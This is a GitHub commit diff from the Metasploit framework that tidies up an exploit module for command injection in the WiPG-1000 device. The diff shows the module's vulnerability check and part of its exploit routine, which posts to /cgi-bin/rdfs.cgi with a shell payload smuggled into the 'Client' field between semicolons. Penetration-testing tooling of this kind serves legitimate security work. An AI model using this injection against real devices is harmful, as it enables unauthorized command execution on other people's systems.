Skip to content

Commit 1d86905

Browse files
committed
Land rapid7#8288, Minor changes to WiPG-1000 module
2 parents c573628 + e333cb6 commit 1d86905

File tree

1 file changed

+5
-5
lines changed

1 file changed

+5
-5
lines changed

modules/exploits/linux/http/wipg1000_cmd_injection.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -50,20 +50,20 @@ def initialize(info={})
5050
def check
5151
res = send_request_cgi({
5252
'method' => 'GET',
53-
'uri' => normalize_uri('/cgi-bin/rdfs.cgi')
53+
'uri' => '/cgi-bin/rdfs.cgi'
5454
})
55-
if res and res.body =~ /Follow administrator instructions to enter the complete path/ then
56-
return Exploit::CheckCode::Appears
55+
if res && res.body.include?("Follow administrator instructions to enter the complete path")
56+
Exploit::CheckCode::Appears
5757
else
58-
return Exploit::CheckCode::Safe
58+
Exploit::CheckCode::Safe
5959
end
6060
end
6161

6262
def exploit
6363
print_status('Sending request')
6464
send_request_cgi(
6565
'method' => 'POST',
66-
'uri' => normalize_uri('/cgi-bin/rdfs.cgi'),
66+
'uri' => '/cgi-bin/rdfs.cgi',
6767
'vars_post' => {
6868
'Client' => ";#{payload.encoded};",
6969
'Download' => 'Download'

0 commit comments

Comments
 (0)